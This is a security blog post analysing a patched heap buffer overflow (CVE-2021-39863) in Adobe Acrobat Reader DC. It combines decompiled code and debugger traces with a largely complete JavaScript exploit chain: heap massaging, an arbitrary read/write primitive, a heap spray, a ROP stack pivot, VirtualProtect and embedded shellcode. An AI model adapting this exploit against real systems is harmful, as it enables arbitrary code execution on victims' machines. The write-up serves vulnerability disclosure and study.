Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the base URL) is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the relative URL). At [5] the length of the Source variable (i.e. the base URL) is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!